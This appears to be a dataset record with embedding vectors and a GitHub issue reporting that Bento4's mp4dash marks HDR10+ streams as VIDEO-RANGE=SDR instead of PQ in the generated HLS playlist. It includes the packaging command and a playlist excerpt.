0.030902357771992683, 0.0035114490892738104, -0.0020458356011658907, -0.01529859472066164, 0.01811739057302475, -0.007388297468423843, 0.008139173500239849, 0.01068090833723545, 0.004734131973236799, -0.015451178885996342, 0.010632723569869995, 0.015370870940387249, 0.02158667892217636, 0.014776594936847687, 0.010640754364430904, -0.012126444838941097, 0.01529859472066164, 0.014913118444383144, -0.002122127916663885, -0.007352159358561039, 0.0088418647646904, -0.014768564142286777, -0.003894917666912079, -0.010769247077405453, 0.03957557678222656, 0.007051005959510803, -0.010383770801126957, 0.029392575845122337, -0.01361213531345129, -0.000666552921757102, 0.02295190654695034, 0.003194234101101756, -0.017699791118502617, -0.004416916985064745, -0.027047593146562576, 0.025039903819561005, 0.024365320801734924, 0.018069205805659294, -0.004589578602463007, -0.004918839316815138, 0.028316453099250793, -0.012680567800998688, 0.032572757452726364, -0.019852034747600555, -0.003200257197022438, -0.008183342404663563, -0.0071112364530563354, 0.024831105023622513, 0.014455365017056465, 0.00033779378281906247, -0.0044329785741865635, -0.008303804323077202, -0.009685094468295574, -0.017458869144320488, 0.003230372443795204, -0.01890440471470356, 0.014985394664108753, -0.007846050895750523, -0.006316191516816616, -0.011789153330028057, 0.013314996846020222, 0.0001682694855844602, -0.00848851166665554, 0.02720820903778076, -0.02160274051129818, 0.001672405400313437, 0.004633747506886721, 0.005966853350400925, 0.015515425242483616, -0.010094663128256798, -0.0007498720660805702, 0.00626800674945116, -0.013355150818824768, 0.005107562057673931, 0.004272363614290953, -0.025602057576179504, -0.008095004595816135, -0.01210235245525837, 0.022855538874864578, 0.003035626607015729, 0.018358314409852028, 0.01843862049281597, -0.004216148052364588, -0.005103547126054764, -0.007585051003843546, -0.002740496303886175, 0.007625204976648092, 0.019498681649565697, -0.0009777448140084743, -0.012511921115219593, -0.00045649841194972396, 0.016703978180885315, 0.006316191516816616, 0.0042081172578036785, 0.017972836270928383, 0.00362588744610548, 0.03125571087002754, -0.0018962627509608865, -0.009090818464756012, 0.0011694792192429304, -0.004175994545221329, -0.008608972653746605, -0.009404017589986324, 0.03295823186635971, 0.008536696434020996, 0.02025357261300087, 0.00044796575093641877, -0.01017497107386589, 0.028171900659799576, -0.01654336228966713, 0.008030758239328861, 0.004493209067732096, 0.002650150330737233, -0.0015268479473888874, -0.014085950329899788, -0.015957117080688477, 0.017009146511554718, 0.0109619852155447, 0.012174629606306553, 0.004408886190503836, -0.006243914365768433, -0.03337583318352699, 0.011218969710171223, 0.00495497789233923, -0.018872281536459923, 0.021008463576436043, 0.02507202699780464, -0.017812222242355347, 0.004284409340471029, -0.007958481088280678, 0.00604716083034873, 0.01720188371837139, -0.016342593356966972, 0.025264766067266464, 0.00340504152700305, 0.008721403777599335, 0.004091671202331781, -0.012495859526097775, -0.027256393805146217, 0.021683046594262123, 0.010913800448179245, 0.0036399411037564278, -0.0060752686113119125, 0.006143529899418354, -0.021008463576436043, -0.009765402413904667, 0.016816407442092896, -0.08204222470521927, 0.01856711320579052, -0.0017888514557853341, 0.009034602902829647, -0.013427427969872952, 0.00455745542421937, 0.010568478144705296, -0.015443148091435432, -0.0060752686113119125, 0.014479457400739193, -0.0020699279848486185, -0.008857926353812218, 0.002375096781179309, 0.003923025447875261, -0.01326681300997734, -0.006561129353940487, -0.0006745837163180113, 0.005778130609542131, 0.0027284501120448112, 0.004673901479691267, -0.021329693496227264, -0.01981991156935692, -0.005444854032248259, 0.01113063097000122, -0.010303462855517864, 0.010094663128256798, 0.007095174863934517, -0.00962887890636921, -0.03857976198196411, -0.012624352239072323, 0.001972554950043559, -0.0010309485951438546, 0.001348163583315909, 0.012471768073737621, -0.0015720209339633584, -0.03989680856466293, 0.0004497224581427872, -0.02079966478049755, 0.013732596300542355, 0.009259464219212532, -0.0012989751994609833, -0.006460744887590408, 0.012279029004275799, -0.001051025465130806, 0.015764378011226654, 0.006822129245847464, -0.009436140768229961, 0.02576267346739769, 0.012616321444511414, -0.001747693750075996, 0.004714054986834526, 0.023690737783908844, 0.021763354539871216, -0.01710551604628563, 0.006492868065834045, 0.005721915513277054, 0.010664846748113632, -0.01546724047511816, 0.018165575340390205, 0.0008512603817507625, 0.01317044347524643, -0.013668350875377655, -0.016575485467910767, -0.015314656309783459, -0.006657498423010111, 0.04343033954501152, -0.00036188605008646846, -0.0066093141213059425, 0.025730550289154053, 0.008014696650207043, 0.027304578572511673, 0.0072397287003695965, -0.038194287568330765, -0.010480139404535294, -0.0012979713501408696, 0.011451860889792442, 0.0003069255326408893, -0.011724906973540783, -0.008713372983038425, 0.024220766499638557, 0.0210566483438015, -0.006986759603023529, 0.007882189005613327, -0.0030316112097352743, -0.006167622283101082, 0.008641095831990242, -0.0015529479132965207, 0.013194535858929157, 0.020542679354548454, -0.008954295888543129, 0.01017497107386589, 0.007914312183856964, -0.02353012189269066, 0.01530662551522255, 0.004045494366437197, 0.011957799084484577, -0.01097804680466652, -0.003461256856098771, -0.017490992322564125, 0.007966511882841587, -0.011893552727997303, -0.0034572414588183165, 0.00014191855734679848, 0.008849895559251308, -0.0014164249878376722, -0.0017707821680232882, -0.012560105882585049, -0.004469117149710655, 0.008191373199224472, 0.008986418135464191, 0.015788471326231956, -0.005954807158559561, -0.0016131785232573748, -0.007340113166719675, 0.015820594504475594, -0.0023550197947770357, -0.028043407946825027, 0.004541393835097551, 0.010672877542674541, 0.005569330882281065, 0.00503126997500658, -0.005376592744141817, 0.0025296888779848814, -0.005067408550530672, -0.009379926137626171, -0.020847847685217857, 0.003272534115239978, 0.012359336949884892, -0.007380266673862934, -0.021988216787576675, 0.015346779488027096, 0.0017747975653037429, 0.014278688468039036, -0.011901583522558212, 0.007520805113017559, -0.015957117080688477, 0.018181636929512024, -0.01220675278455019, -0.015668010339140892, -0.00725980568677187, 0.0030938496347516775, -0.011363523080945015, -0.01708945445716381, 0.014648103155195713, -0.0007262817234732211, -0.01765160635113716, -0.008584880270063877, 0.004702008794993162, 0.008187358267605305, 0.003509441390633583, 0.015884840860962868, 0.016559423878788948, -0.006336268503218889, -0.001651324681006372, -0.005581377074122429, 0.023305261507630348, 0.0203660037368536, 0.007022898178547621, -0.019723542034626007, -0.007384282071143389, 0.00787014327943325, 0.01888834312558174, -0.004216148052364588, 0.013981550000607967, -0.005075439345091581, -0.007340113166719675, -0.006111407186836004, 0.0066093141213059425, 0.003563649021089077, -0.02060692571103573, 0.022309446707367897, 0.020446309819817543, -0.008801710791885853, 0.016222132369875908, 0.002192396903410554, -0.005898592062294483, -0.01272072084248066, -0.01957898959517479, -0.009155064821243286, -0.00703092897310853, -0.0027967116329818964, -0.0012297098292037845, -0.012744813226163387, -0.02012507990002632, -0.010319524444639683, -0.004617685917764902, 0.0286698080599308, 0.01810132898390293, 0.007717558648437262, -0.0004283907765056938, 0.02518445812165737, 0.0019504703814163804, 0.0029533114284276962, -0.021634863689541817, 0.02195609360933304, -0.002437335206195712, 0.013178474269807339, 0.002768603852018714, -0.0210566483438015, -0.006882359739392996, 0.02092815563082695, 0.010263308882713318, 0.019868096336722374, 0.02711183950304985, 0.006079284008592367, -0.024140458554029465, 0.025698427110910416, 0.000501420465297997, -0.0026621962897479534, 0.013483643531799316, 0.0023710813838988543, 0.0018812051275745034, 0.002561811823397875, -0.004625716712325811, 0.025987533852458, -0.012993766926229, -0.014206411316990852, 0.04031440615653992, 0.00945220235735178, -0.0026340887416154146, 0.030067158862948418, -0.003714225720614195, 0.008536696434020996, 0.020671172067523003, 0.0008673219126649201, -0.02160274051129818, 0.0012206753017380834, 0.018647421151399612, -0.003537548938766122, 0.017844345420598984, 0.0074083744548261166, 0.010745154693722725, 0.01219872198998928, 0.024927474558353424, 0.004091671202331781, -0.016848530620336533, -0.005332423374056816, -0.0009862774750217795, 0.015499363653361797, -0.00666552921757102, 0.008271681144833565, -0.016326531767845154, -0.014262626878917217, -0.00764929736033082, -0.02023751102387905, 0.009042633697390556, 0.0035957719665020704, -0.0033106801565736532, 0.004521316848695278, -0.031095096841454506, -0.007950450293719769, 0.006392483599483967, -0.037069980055093765, 0.025939349085092545, -0.0027224270161241293, -0.00831986591219902, -0.012560105882585049, 0.00795446615666151, 0.019209573045372963, 0.0026762501802295446, -0.012126444838941097, 0.0070670670829713345, 0.03366493806242943, 0.020382065325975418, 0.007689450867474079, -0.00893823429942131, -0.01080137025564909, -0.0265496876090765, -0.007829989306628704, -0.025136273354291916, 0.00358372600749135, -0.0005651646060869098, -0.04795968905091286, -0.02801128476858139, -0.010825462639331818, -0.024365320801734924, -0.0025537810288369656, -0.0026079886592924595, 0.004842547234147787, -0.000630414520855993, -0.018695605918765068, -0.01389321219176054, -0.02441350556910038, 0.002612004056572914, 0.012431614100933075, -0.0006108395755290985, -0.026276640594005585, -0.0022144815884530544, -0.0033367800060659647, 0.005111577454954386, 0.0011222984176129103, -0.005183854606002569, 0.0012176637537777424, -0.027304578572511673, -0.0407320074737072, 0.0038206332828849554, -0.00333276460878551, 0.008809741586446762, -0.031657248735427856, 0.009122941642999649, -0.009853740222752094, -0.01834225282073021, -0.007528835907578468, 0.002284750808030367, -0.011379584670066833, -0.004958993289619684, 0.029167713597416878, 0.009235371835529804, 0.012905428186058998, 0.005958822555840015, -0.006814098451286554, -0.007263821084052324, 0.016222132369875908, 0.0034853490069508553, 0.0034431875683367252, 0.03996105492115021, 0.01451158057898283, 0.01570013165473938, -0.0005812261370010674, -0.009845709428191185, 0.02259855344891548, -0.007942420430481434, -0.027930976822972298, -0.013082105666399002, 0.004469117149710655, 0.0032163187861442566, 0.01720188371837139, -0.012865275144577026, 0.008882018737494946, 0.01616591587662697, -0.001666382304392755, 0.022887662053108215, 0.0002825823030434549, 0.015274502336978912, -0.018599236384034157, 0.016069548204541206, -0.009532510302960873, -0.010624692775309086, -0.00382464868016541, -0.005525161512196064, 0.013218628242611885, 0.01023118570446968, 0.010383770801126957, 0.004525332245975733, 0.010030416771769524, -0.00865715742111206, -0.001651324681006372, 0.0018952590180560946, 0.011973860673606396, -0.0038627947214990854, -0.006545068230479956, 0.010215124115347862, -0.014527642168104649, 0.013178474269807339, 0.005107562057673931, 0.01708945445716381, 0.01598120853304863, -0.0076854354701936245, -0.00267223478294909, 0.03172149509191513, 0.014471426606178284, -0.01052029337733984, 0.002065912587568164, -0.024124398827552795, -0.015507394447922707, 0.027047593146562576, 0.01327484380453825, 0.025618119165301323, 0.004260317422449589, 0.009090818464756012, 0.006083299405872822, -0.015266471542418003, 0.008890049532055855, 0.0707349181175232, -0.010255278088152409, 0.006761898286640644, -0.024815043434500694, 0.006986759603023529, 0.009090818464756012, -0.0032825723756104708, 0.051589589565992355, -0.02227732352912426, 0.025232642889022827, -0.0010951947188004851, -0.008713372983038425, -0.019081082195043564, 0.005003162194043398, -0.018599236384034157, -0.005332423374056816, 0.0009310660534538329, -0.030870234593749046, 0.007508758921176195, 0.010407863184809685, -0.01991628110408783, -0.0022024353966116905, 0.004637762904167175, -0.0016041439957916737, 0.011564292013645172, -0.025264766067266464, -0.02577873505651951, -0.01596514694392681, 0.010415893979370594, 0.020992401987314224, -0.004918839316815138, -0.02450987510383129, -0.018053144216537476, 0.010753185488283634, -0.0042522866278886795, 0.002885049907490611, -0.01935412734746933, 0.02634088695049286, 0.01562785543501377, 0.025409318506717682, 0.014182318933308125, -0.003716233419254422, 0.0013883173232898116, -0.008954295888543129, 0.02195609360933304, 0.00035761971957981586, -0.0062559605576097965, 0.004163948353379965, 0.005432807840406895, 0.0016101670917123556, -0.006890390533953905, -0.014897056855261326, 0.007781805004924536, -0.03136814013123512, 0.013130289502441883, 0.008882018737494946, 0.012078260071575642, 0.013058013282716274, 0.010110724717378616, -0.01378881186246872, 0.00016852044791448861, 0.014993425458669662, -0.001978578045964241, 0.010480139404535294, -0.0176837295293808, -0.019771726801991463, -0.010881677269935608, -0.0015178133035078645, -0.00012949598021805286, 0.012993766926229, 0.014463395811617374, -0.009074756875634193, -0.002774626947939396, -0.007348143961280584, -0.004822470247745514, 0.011572322808206081, -0.0035495951306074858, 0.0007222663261927664, -0.01457582600414753, -0.006063222419470549, -0.00803878903388977, 0.0009651967557147145, -0.014367026276886463, 0.015033579431474209, -0.008014696650207043, 0.00035837257746607065, -0.010833492502570152, 0.006035114638507366, -0.0036359259393066168, 0.007934389635920525, 0.02420470491051674, 0.01614985428750515, -0.01345152035355568, -0.010737123899161816, 0.021795477718114853, -0.010616662912070751, 0.017282191663980484, 0.011347461491823196, 0.014415211044251919, -0.02060692571103573, -0.003854763926938176, 0.004404870793223381, 0.0014134134398773313, -0.00047180705587379634, -0.006372406613081694, 0.015635887160897255, 0.02406015247106552, 0.015635887160897255, 0.012857244350016117, -0.012174629606306553, -0.008078943006694317, 0.0031560880597680807, -0.01361213531345129, 0.0089944489300251, 0.0011795175960287452, -0.03813004121184349, 0.007107221055775881, -0.0046136705204844475, 0.015483302064239979, -0.0026220425497740507, -0.023771043866872787, -0.012303121387958527, -0.011740968562662601, -0.009171126410365105, 0.005729945842176676, 0.003872833214700222, 0.008681249804794788, -0.019418373703956604, 0.033022478222846985, 0.016109701246023178, -0.024702612310647964, 0.0029974805656820536, 0.01665579341351986, 0.01191764511168003, -0.00014505557192023844, 0.0030215727165341377, 0.0004750695370603353, 0.007528835907578468, 0.010905769653618336, 0.010624692775309086, 0.034018293023109436, -0.0029011114966124296, 0.03070962056517601, 0.008099019527435303, 0.005296285264194012, 0.004045494366437197, 0.03514259681105614, -0.00900247972458601, 0.017121577635407448, 0.007091159466654062, -0.02361042983829975, 0.028830422088503838, 0.011893552727997303, -0.005653653759509325, 0.009058695286512375, -0.01847074367105961, -0.003551602829247713, -0.001330094295553863, 0.012792997993528843, -0.002975395880639553, -0.006436652969568968, -0.0007062047952786088, -0.015828624367713928, 0.00020101992413401604, 0.013861089013516903, 0.016607608646154404, 0.01300179772078991, -0.01456779520958662, 0.01789253018796444, -0.016575485467910767, -0.01663973182439804, 0.009492356330156326, -0.004368732683360577, 0.013202566653490067, 0.0037744564469903708, 0.015419055707752705, 0.0034632645547389984, 0.00018583676137495786, -0.017041269689798355, -0.008239557966589928, 0.011194877326488495, 0.024718673899769783, 0.020655110478401184, 0.037873055785894394, -0.011965829879045486, 0.009934048168361187, 0.015330717898905277, -0.0010038447799161077, 0.00027179098105989397, -0.009315679781138897, 0.009347802959382534, 0.01877591200172901, -0.016928838565945625, -0.01981991156935692, 0.0025417350698262453, 0.0101830018684268, -0.0008146200561895967, 0.008520634844899178, 0.005942760966718197, -0.016671855002641678, -0.005248100496828556, 0.002114097122102976, -0.00910688005387783, 0.001191563787870109, 0.007046990562230349, 0.027384886518120766, 0.000777477805968374, 0.003963179420679808, 0.011074415408074856, 0.011829307302832603, 0.017410684376955032 ]
null
null
null
null
null
null
null
null
null
[ "axiomatic-systems", "Bento4" ]
I have packaged the HDR10Plus content with the latest bento4, but the playback was not working. As per observation in the m3u8 file, the VIDEO-RANGE tag is coming as SDR instead of PQ. Bento4 Command line : ``` ./bento4/bin/mp4dash -- encryption-key=bbbbbbdc4b704b2eb610682bb8222222:aaaaaa5627905cfd341fce15bc222222:894b570bfc4525fae2fbbfdf77ccc111 --fairplay-key-uri=skd://abc --encryption-cenc-scheme=cbcs --hls hdr10plusfrag.mp4 --hls-master-playlist-name=index.m3u8 --output-dir=./output ``` ---- M3U8 File: ``` #EXTM3U # Created with Bento4 mp4-dash.py, VERSION=2.0.0-641 # #EXT-X-VERSION:6 # Media Playlists # Audio #EXT-X-MEDIA:TYPE=AUDIO,GROUP-ID="audio/ec-3",LANGUAGE="de",NAME="Deutsch",AUTOSELECT=YES,DEFAULT=YES,CHANNELS="16/JOC",URI="audio/de/ec-3/media.m3u8" #EXT-X-MEDIA:TYPE=AUDIO,GROUP-ID="audio/mp4a.40.2",LANGUAGE="en",NAME="English",AUTOSELECT=YES,DEFAULT=YES,CHANNELS="2",URI="audio/ta/mp4a.40.2/media.m3u8" # Video #EXT-X-STREAM-INF:AUDIO="audio/ec-3",AVERAGE-BANDWIDTH=735846,BANDWIDTH=803514,VIDEO-RANGE=SDR,CODECS="hvc1.2.4.L90.b0,ec-3",RESOLUTION=640x360,FRAME-RATE=25.000 video/hvc1/1/media.m3u8 #EXT-X-STREAM-INF:AUDIO="audio/mp4a.40.2",AVERAGE-BANDWIDTH=416348,BANDWIDTH=484500,VIDEO-RANGE=SDR,CODECS="hvc1.2.4.L90.b0,mp4a.40.2",RESOLUTION=640x360,FRAME-RATE=25.000 video/hvc1/1/media.m3u8 #EXT-X-STREAM-INF:AUDIO="audio/ec-3",AVERAGE-BANDWIDTH=1000479,BANDWIDTH=1145396,VIDEO-RANGE=SDR,CODECS="hvc1.2.4.L90.b0,ec-3",RESOLUTION=768x432,FRAME-RATE=25.000 video/hvc1/2/media.m3u8 #EXT-X-STREAM-INF:AUDIO="audio/mp4a.40.2",AVERAGE-BANDWIDTH=680981,BANDWIDTH=826382,VIDEO-RANGE=SDR,CODECS="hvc1.2.4.L90.b0,mp4a.40.2",RESOLUTION=768x432,FRAME-RATE=25.000 ``` Could you please fix this issue in the upcoming version?
HDR10Plus signaling issue
https://api.github.com/repos/axiomatic-systems/Bento4/issues/956/comments
1
2024-04-19T13:56:09
2024-04-27T12:06:41Z
https://github.com/axiomatic-systems/Bento4/issues/956
2,253,089,934
956
false
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : HDR10Plus signaling issue Issue date: --- start body --- I have packaged the HDR10Plus content with the latest bento4, but the playback was not working. As per observation in the m3u8 file, the VIDEO-RANGE tag is coming as SDR instead of PQ. Bento4 Command line : ``` ./bento4/bin/mp4dash -- encryption-key=bbbbbbdc4b704b2eb610682bb8222222:aaaaaa5627905cfd341fce15bc222222:894b570bfc4525fae2fbbfdf77ccc111 --fairplay-key-uri=skd://abc --encryption-cenc-scheme=cbcs --hls hdr10plusfrag.mp4 --hls-master-playlist-name=index.m3u8 --output-dir=./output ``` ---- M3U8 File: ``` #EXTM3U # Created with Bento4 mp4-dash.py, VERSION=2.0.0-641 # #EXT-X-VERSION:6 # Media Playlists # Audio #EXT-X-MEDIA:TYPE=AUDIO,GROUP-ID="audio/ec-3",LANGUAGE="de",NAME="Deutsch",AUTOSELECT=YES,DEFAULT=YES,CHANNELS="16/JOC",URI="audio/de/ec-3/media.m3u8" #EXT-X-MEDIA:TYPE=AUDIO,GROUP-ID="audio/mp4a.40.2",LANGUAGE="en",NAME="English",AUTOSELECT=YES,DEFAULT=YES,CHANNELS="2",URI="audio/ta/mp4a.40.2/media.m3u8" # Video #EXT-X-STREAM-INF:AUDIO="audio/ec-3",AVERAGE-BANDWIDTH=735846,BANDWIDTH=803514,VIDEO-RANGE=SDR,CODECS="hvc1.2.4.L90.b0,ec-3",RESOLUTION=640x360,FRAME-RATE=25.000 video/hvc1/1/media.m3u8 #EXT-X-STREAM-INF:AUDIO="audio/mp4a.40.2",AVERAGE-BANDWIDTH=416348,BANDWIDTH=484500,VIDEO-RANGE=SDR,CODECS="hvc1.2.4.L90.b0,mp4a.40.2",RESOLUTION=640x360,FRAME-RATE=25.000 video/hvc1/1/media.m3u8 #EXT-X-STREAM-INF:AUDIO="audio/ec-3",AVERAGE-BANDWIDTH=1000479,BANDWIDTH=1145396,VIDEO-RANGE=SDR,CODECS="hvc1.2.4.L90.b0,ec-3",RESOLUTION=768x432,FRAME-RATE=25.000 video/hvc1/2/media.m3u8 #EXT-X-STREAM-INF:AUDIO="audio/mp4a.40.2",AVERAGE-BANDWIDTH=680981,BANDWIDTH=826382,VIDEO-RANGE=SDR,CODECS="hvc1.2.4.L90.b0,mp4a.40.2",RESOLUTION=768x432,FRAME-RATE=25.000 ``` Could you please fix this issue in the upcoming version? --- end body ---
1,925
[ -0.006350389216095209, 0.022913368418812752, -0.016472429037094116, 0.019023608416318893, -0.00006846697942819446, 0.014141721650958061, -0.022708645090460777, 0.06018893048167229, -0.034834619611501694, 0.014322823844850063, 0.04390547797083855, -0.022566912695765495, 0.028803128749132156, 0.018614159896969795, -0.03011021390557289, 0.004622044041752815, -0.015874003991484642, 0.024393683299422264, -0.04718106612563133, 0.0128503842279315, 0.02593698911368847, -0.01864565536379814, -0.007704718504101038, 0.06330703943967819, -0.0012175188167020679, 0.01533857174217701, -0.01793699525296688, 0.017763765528798103, -0.0004596453218255192, 0.0049133822321891785, 0.011511802673339844, 0.003122044960036874, -0.016173215582966805, 0.027307067066431046, 0.007696844637393951, 0.03385824337601662, 0.05004720762372017, 0.05486610159277916, -0.009826764464378357, 0.02467714622616768, -0.024173211306333542, -0.031118087470531464, -0.008291332051157951, 0.02023620530962944, -0.023700769990682602, -0.004330705385655165, 0.01732282154262066, -0.0033051157370209694, -0.03217320516705513, -0.048503901809453964, -0.013661406934261322, -0.05240941047668457, -0.035307060927152634, -0.015299201011657715, -0.017039356753230095, -0.05029917508363724, 0.040346428751945496, 0.044157449156045914, -0.005484248045831919, 0.035936981439590454, 0.004677162040024996, 0.017811009660363197, -0.01320471428334713, 0.02814171090722084, 0.019007859751582146, 0.009511804208159447, -0.01036219671368599, 0.029779504984617233, -0.023212581872940063, 0.034897610545158386, -0.005429130047559738, -0.03335430473089218, 0.03669288754463196, 0.03848816081881523, 0.011527550406754017, -0.019181087613105774, 0.03335430473089218, 0.03382674604654312, -0.022267699241638184, 0.023574786260724068, -0.04277162253856659, 0.010220465250313282, -0.06337003409862518, 0.027574783191084862, 0.042267683893442154, 0.01746455393731594, -0.009952748194336891, -0.06771648675203323, -0.04085036367177963, -0.02062990516424179, -0.009062985889613628, 0.024803131818771362, 0.031259819865226746, -0.027401555329561234, 0.036787375807762146, 0.0561259426176548, -0.009496055543422699, -0.0016112192533910275, -0.07042514532804489, -0.018314946442842484, -0.04258264601230621, 0.0070078689604997635, 0.03785824030637741, -0.026267698034644127, 0.02987399324774742, -0.02330707013607025, -0.0011840543011203408, -0.034834619611501694, -0.005956688430160284, 0.08283458650112152, 0.01299999002367258, -0.011929124593734741, -0.01708660088479519, 0.026141712442040443, -0.021559039130806923, 0.006952750962227583, -0.0002515992382541299, -0.04935429245233536, -0.0027696830220520496, 0.005185035523027182, -0.03451966121792793, -0.027165334671735764, -0.03455115482211113, 0.03157477825880051, -0.01395274605602026, 0.020913369953632355, -0.030377930030226707, 0.0036338556092232466, 0.04072437807917595, -0.03839367255568504, -0.030551157891750336, -0.007909443229436874, -0.0027460609562695026, -0.021370062604546547, -0.025322815403342247, 0.012818887829780579, -0.0069133806973695755, 0.02166927605867386, -0.011881881393492222, -0.0003612202126532793, -0.033889736980199814, -0.02916533313691616, 0.059181056916713715, 0.01919683627784252, -0.029527537524700165, 0.008393694646656513, -0.0024783445987850428, 0.03943304345011711, -0.030094465240836143, -0.00393503624945879, 0.005421255715191364, -0.024850375950336456, -0.018125971779227257, -0.021763764321804047, 0.031165331602096558, 0.016157468780875206, -0.023118093609809875, 0.010779519565403461, -0.007795270066708326, -0.0004060036444570869, 0.023291321471333504, 0.0012017707340419292, -0.0035669265780597925, 0.015519673936069012, 0.023968486115336418, -0.003897635033354163, -0.005208657588809729, 0.009692906402051449, 0.002062990562990308, 0.013960619457066059, -0.003098422894254327, -0.0032913361210376024, 0.007220467086881399, 0.013944871723651886, -0.06853538006544113, -0.010535425506532192, 0.03058265522122383, 0.00729526998475194, -0.023905493319034576, -0.019952740520238876, -0.0331968255341053, -0.0010472433641552925, -0.02181100659072399, -0.01454329676926136, 0.0174015611410141, -0.04485036060214043, 0.05653539299964905, -0.03313383460044861, 0.028724389150738716, 0.016960617154836655, 0.011244086548686028, 0.07023616880178452, 0.019039355218410492, -0.006220467854291201, 0.01722833327949047, -0.02585824951529503, 0.011976368725299835, -0.08415741473436356, 0.0031673205085098743, 0.017370065674185753, 0.023936990648508072, 0.00002432945984764956, 0.006255900952965021, -0.034582652151584625, -0.01299999002367258, 0.00984251219779253, 0.02749604359269142, 0.055842477828264236, 0.010866133496165276, 0.008787395432591438, -0.05077161639928818, -0.024236202239990234, 0.029905490577220917, 0.05811019241809845, -0.01485825702548027, 0.024535415694117546, -0.01573227159678936, 0.009999992325901985, -0.030251946300268173, -0.00564960204064846, 0.0015196838648989797, -0.02601572871208191, 0.006854325532913208, -0.0034704699646681547, -0.028818875551223755, 0.022078724578022957, -0.007980309426784515, -0.014244084246456623, -0.02212596870958805, -0.014456681907176971, 0.015842508524656296, 0.0026279508601874113, -0.04116532579064369, -0.03496060520410538, 0.03527556359767914, 0.0245196670293808, -0.018314946442842484, -0.01288188062608242, -0.034582652151584625, -0.004303146619349718, -0.0363779254257679, 0.034740131348371506, -0.0009281489183194935, -0.0017765734810382128, 0.006059050559997559, 0.04148028418421745, 0.015559043735265732, 0.03075588308274746, 0.00009381144627695903, 0.01628345251083374, -0.01268502976745367, -0.02064565382897854, 0.008212592452764511, 0.015086603350937366, -0.0004456197493709624, 0.04538579285144806, 0.033165328204631805, 0.032755881547927856, 0.002395667601376772, -0.04670862853527069, 0.015464555472135544, 0.01149605493992567, -0.009614165872335434, -0.06148026883602142, 0.01205510925501585, -0.005862200167030096, -0.00952755194157362, 0.005913381464779377, -0.012503927573561668, -0.025716517120599747, 0.04056689888238907, -0.029212577268481255, -0.01842518337070942, 0.009275583550333977, -0.024330690503120422, 0.007846451364457607, 0.020929118618369102, -0.01691337302327156, 0.023574786260724068, -0.035685013979673386, 0.011929124593734741, 0.030787378549575806, 0.02507084794342518, 0.017590537667274475, 0.007090545725077391, -0.010196843184530735, 0.020503921434283257, -0.009535426273941994, -0.06292908638715744, 0.002151573309674859, 0.009913378395140171, 0.024377934634685516, -0.02955903299152851, -0.000923719780985266, 0.018314946442842484, -0.002592517761513591, -0.0014202744932845235, 0.009464560076594353, 0.027338562533259392, -0.008543300442397594, -0.007448813412338495, 0.006122042890638113, -0.004641728941351175, 0.00020410910656210035, -0.041228316724300385, 0.022897621616721153, -0.016409436240792274, 0.027480294927954674, -0.024629903957247734, -0.017496049404144287, 0.031102338805794716, -0.0040866113267838955, -0.02648817002773285, -0.020488174632191658, -0.03451966121792793, 0.021370062604546547, -0.0030433048959821463, 0.0007224404253065586, -0.026897618547081947, -0.005248027853667736, -0.042897604405879974, 0.014078729785978794, -0.03707084059715271, 0.01466140616685152, -0.012559046037495136, -0.002706690924242139, -0.018787387758493423, -0.00021813467901665717, -0.031338561326265335, 0.027936987578868866, -0.005665350239723921, 0.006216530688107014, 0.04749602824449539, -0.007102356757968664, 0.04737004265189171, -0.031496040523052216, -0.017889751121401787, -0.03152753412723541, -0.01840943470597267, 0.013078730553388596, 0.004968500230461359, 0.0005959641421213746, -0.011141723953187466, -0.005555113777518272, 0.0004259347333572805, -0.024629903957247734, -0.007433065213263035, 0.023606281727552414, 0.05250389873981476, 0.02362203039228916, 0.0010054126614704728, 0.013811013661324978, 0.007881883531808853, 0.03470863401889801, 0.019826756790280342, -0.019496047869324684, -0.023763762786984444, -0.019968489184975624, 0.03121257573366165, -0.00866141077131033, -0.017133845016360283, -0.042897604405879974, 0.003978343680500984, 0.03170076385140419, 0.006090546492487192, -0.00030733246239833534, -0.011448810808360577, 0.02047242596745491, -0.007417317479848862, -0.029464544728398323, -0.0013720461865887046, 0.010062985122203827, -0.03896060213446617, 0.05508657172322273, -0.04491335153579712, -0.007452750578522682, -0.004992122296243906, 0.003964563831686974, -0.036724381148815155, 0.03439367562532425, -0.03770076110959053, 0.024960611015558243, 0.019385812804102898, -0.03697635233402252, 0.019338568672537804, 0.02823619917035103, 0.02229919657111168, 0.0037342491559684277, -0.015023610554635525, -0.03291336074471474, -0.017417309805750847, 0.011645660735666752, -0.02576376125216484, -0.04768500477075577, -0.02253541722893715, 0.03943304345011711, -0.041606269776821136, 0.0007465545786544681, 0.03930705785751343, -0.033322811126708984, 0.03896060213446617, -0.021700771525502205, 0.02442517876625061, 0.00035063951509073377, -0.02096061408519745, 0.029196828603744507, -0.017448805272579193, 0.002472439082339406, 0.04519681632518768, 0.002309053437784314, 0.008480308577418327, -0.0024370059836655855, -0.002090549562126398, -0.0040590520948171616, 0.02078738622367382, 0.006685034371912479, 0.007165349088609219, 0.032850369811058044, -0.017921246588230133, 0.03811020776629448, 0.02190549485385418, 0.005519681144505739, -0.03171651065349579, -0.01937006413936615, 0.04195272549986839, 0.023275572806596756, -0.025590531527996063, 0.026299193501472473, 0.04998421669006348, 0.010692905634641647, -0.013259832747280598, -0.05445665121078491, 0.00858267117291689, -0.042645636945962906, -0.006885821465402842, 0.019464552402496338, -0.008881882764399052, 0.009062985889613628, -0.011763771064579487, 0.027889743447303772, -0.03099210374057293, 0.007771648000925779, -0.013551170937716961, -0.0017667310312390327, 0.0048622009344398975, -0.013669281266629696, -0.024692894890904427, -0.026897618547081947, -0.02560628019273281, 0.0005002457182854414, -0.010606291703879833, 0.030456669628620148, 0.020614158362150192, 0.009850386530160904, -0.008173222653567791, 0.006562987342476845, -0.006220467854291201, 0.005082673393189907, 0.044220440089702606, -0.006811018567532301, -0.0331968255341053, 0.031102338805794716, 0.014488178305327892, -0.02902360074222088, 0.026913365349173546, -0.004499996546655893, -0.024173211306333542, -0.01919683627784252, 0.011456684209406376, -0.003507871413603425, -0.016976365819573402, -0.011047235690057278, -0.009716528467833996, 0.0012775581562891603, -0.01872439496219158, 0.013779517263174057, -0.025086594745516777, -0.03776375204324722, 0.02869289182126522, -0.02971651405096054, 0.012779518030583858, -0.01644093357026577, 0.025102343410253525, 0.01708660088479519, -0.002773619955405593, 0.005700783338397741, -0.011598416604101658, 0.016314947977662086, -0.01722833327949047, -0.017275577411055565, 0.005421255715191364, -0.017196837812662125, 0.026897618547081947, -0.013031486421823502, 0.007744088768959045, 0.007389758247882128, 0.009937000460922718, 0.00983463879674673, 0.029905490577220917, 0.01675589382648468, 